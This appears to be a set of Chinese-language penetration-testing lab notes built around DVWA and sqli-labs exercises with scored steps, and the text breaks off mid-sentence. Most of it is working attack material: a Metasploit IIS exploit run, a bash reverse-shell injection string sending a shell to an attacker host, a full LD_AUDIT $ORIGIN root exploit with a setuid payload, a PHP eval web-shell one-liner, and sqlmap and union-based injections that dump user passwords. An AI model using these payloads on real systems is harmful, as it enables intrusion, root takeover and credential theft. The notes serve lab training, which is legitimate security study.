astartx进入图形界面
端口扫描:
nmap 192.168.1.10   #扫描同一段的ip
nmap 192.168.1.0/24  #扫描整个段
nmap -sT 192.168.1.118  #-sT来实现tcp连接扫描
nmap -sU 192.168.1.119  #-sU来实现udp扫描
nmap -sN 22,25,80,3306 192.168.1.118  #扫描指定端口
nmap 192.168.1.118 -oX hh.xml #扫描结果导出到hh.xml
抓包:
tcpdump –nnX tcp and host 192.168.1.119   #这里的ip为攻击机
数据抓取监控
wireshark
 
转换格式:
xsltproc hh.xml -o hh.html
漏洞扫描:
firefox https://localhost:8834
 
msfconsole 攻击:
漏洞代码:MS04_007
search ms04_007       #查看该漏洞使用的exploit模块
use exploit/windows/iis/ms01_026_dbldecode       #使用模块
show options        #查看设置参数
set RHOST 192.168.1.173       #设置RHOST(攻击目标)
SET LHOST 192.168.1.174        #设置LHOST(攻击机)
show options       #查看需要设置哪些配置参数
exploit        #漏洞利用,会看到ip 192.168.1.173反弹连接到了我们本地的4444端口
成功!
DVWA渗透:
nc -v-l-p 80  #监听本机80端口
;/bin/bash –i > /dev/tcp/172.16.1.52/80|0<&1 2>&1   #在注入漏洞模块提交
此时本机Kali中会反弹回来一个被攻击机的shell
id   #查看用户属性
uname -a   #查看系统版本号
通过提取文档进行复制粘贴提取
;/bin/bash –i > /dev/tcp/10.1.7.69/80|0<&1 2>&1
--------------------------------------------
提权exp详细解析:
# 在/tmp下创建可控制的目录
 
$ mkdir /tmp/exploit
# 链接到suid二进制程序以更改$ORIGIN的定义
 
$ ln /bin/ping /tmp/exploit/target
# 打开到目标二进制程序的文件描述符
 
$ exec 3< /tmp/exploit/target
# 现在可通过/proc访问描述符
 
$ ls -l /proc/$$/fd/3
 
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# 删除之前所创建的目录
 
$ rm -rf /tmp/exploit/
# /proc链接仍存在,但已标记为已被删除
 
$ ls -l /proc/$$/fd/3
 
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# 使用负载DSO替换目录,使$ORIGIN成为到dlopen()的有效目标
 
$ cat > payload.c
 
void __attribute__((constructor)) init()
 
{
 
setuid(0);
 
system("/bin/bash");
 
}
 
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
 
$ ls -l /tmp/exploit
 
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN
 
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
 
--------------------------------------------
当UID=0,即得root权限
建立一个一句话木马文件
echo "<?php @ecal(\$_POST[\"elab\"]); ?>" > /dvw/aa.php
菜刀进入
http://172.16.1.57/dvwa/aa.php
 
 
sqlmap:
该界面是通过输入用户id 查询用户信息,用户id 是小于20的id
1.找到sql注入点,通过 ' 字符验证有SQL注入漏洞(1分)
1''
http://blog.sina.com.cn/s/blog_5c92dd1f0102vjfg.html
2.查看页面源代码,找到页面"Submit"的名字和值,并截屏(2分)
右键加V  查找
3.通过浏览器及其插件得到cookie 值,并截屏(2分)
4.在xclient 用sqlmap 做注入攻击,获取后台的数据库信息,操作系统信息,以及web系统信息,并截
屏(2分)
5.在xclient 用sqlmap 做注入攻击,获取当前数据库名,并截屏(2分)
sqlmap -r /root/aaa.txt --dbs
./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”
1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”
2、-u : 指定目标URL
3、-b : 获取DBMS banner
4、–current-db : 获取当前数据库
5、–current-user:获取当前用户
#aaa.txt为cookie
6.在xclient 用sqlmap 做注入攻击,获取当前数据库的所有表,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa --tables
 
7.猜测当前的用户信息表名,在xclient 用sqlmap 做注入攻击,获取当前数据库的用户表的结构,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa -T users --columns
#-T : 要枚举的DBMS数据库表  –columns : 枚举  DBMS数据库表中的所有列
 
8.在xclient 用sqlmap 做注入攻击,获取当前数据库的用户表内容信息,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa -T users-C user,password --dump
- -T : 要枚举的DBMS数据表
- -C: 要枚举的DBMS数据表中的列
- –dump : 转储DBMS数据表项
用法:python sqlmap [options]
-
- 选项:
-   -h,--help显示基本帮助消息并退出
-   -hh显示高级帮助消息并退出
-   --version显示程序的版本号并退出
-   -v VERBOSE等级:0-6(默认值1)
-
-   目标:
-     必须提供这些选项中的至少一个来定义
-     目标
-
-     -u URL,--url = URL目标URL(例如“http://www.site.com/vuln.php?id=1”)
-     -g GOOGLEDORK将Google dork结果作为目标网址进行处理
-
-   请求:
-     这些选项可用于指定如何连接到目标URL
-
-     --data = DATA通过POST发送的数据字符串
-     --cookie = COOKIE HTTP Cookie头值
-     --random-agent使用随机选择的HTTP User-Agent头值
-     --proxy = PROXY使用代理连接到目标URL
-     --tor使用Tor匿名网络
-     - 检查Tor检查Tor是否正确使用
-
-   注射:
-     这些选项可用于指定要测试的参数,
-     提供自定义注入有效载荷和可选的篡改脚本
-
-     -p TESTPARAMETER可测试参数
-     --dbms = DBMS将后端DBMS强制为此值
-
-   检测:
-     这些选项可用于自定义检测阶段
-
-     --level = LEVEL要执行的测试级别(1-5,默认为1)
-     --risk =风险执行测试的风险(0-3,默认值1)
-
-   技术:
-     这些选项可用于调整特定SQL注入的测试
-     技术
-
-     --technique = TECH SQL注入技术使用(默认为“BEUSTQ”)
-
-   枚举:
-     这些选项可用于枚举后端数据库
-     管理系统信息,结构和数据包含在
-     表。此外,您可以运行自己的SQL语句
-
-     -a,--all检索所有内容
-     -b,--banner检索DBMS横幅
-     --current-user检索DBMS当前用户
-     --current-db检索DBMS当前数据库
-     --passwords枚举DBMS用户密码散列
-     --tables枚举DBMS数据库表
-     - 列列举DBMS数据库表列
-     --schema枚举DBMS模式
-     - 转储转储DBMS数据库表条目
-     --dump-all转储所有DBMS数据库表条目
-     -D DB DBMS数据库枚举
-     -T TBL要列举的DBMS数据库表
-     -C COL DBMS数据库表列列出
-
-   操作系统访问:
-     这些选项可用于访问后端数据库管理
-     系统底层操作系统
-
-     --os-shell提示交互式操作系统shell
-     --os-pwn提示OOB shell,Meterpreter或VNC
-
-   一般:
-     这些选项可用于设置一些一般工作参数
-
-     --batch不要求用户输入,使用默认行为
-     --flush-session刷新当前目标的会话文件
-
-   杂:
-     --sqlmap-shell提示交互式sqlmap shell
-     --wizard初学者用户的简单向导界面
-
- [!]以“-hh”运行的完整选项列表
- root @ kali:〜#
sql手动注入:
      http://localhost/sqlilabs/Less-2/?id=1id是一个注入点
 

后台的SQL语句的写法大致为

1
select username,password,[....] from table where id=userinput
那么我们通过使用order by的语句来判断select所查询字段的数目。# SELECT 语句用于从表中选取数据。

那么payload变为:

1
当使用order by 4时程序出错,那么select的字段一共是3个。

得到显示位

在页面上会显示从select中选取的字段,我们接下来就是要判断显示的字段是哪几个字段。

使用如下的payload(两者均可)进行判断。

1
2

当使用个如上的payload时,页面的显示如下:

通过如上的页面显示就可以知道,页面中显示的是第2位和第3位的信息。

查选库

在知道了显示位之后,那么接下来就可以通过显示位来显示我们想知道的信息,如数据库的版本,用户信息等等。那么我们使用如下的payload就可以知道相关的信息。

1
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()

此时页面的显示为: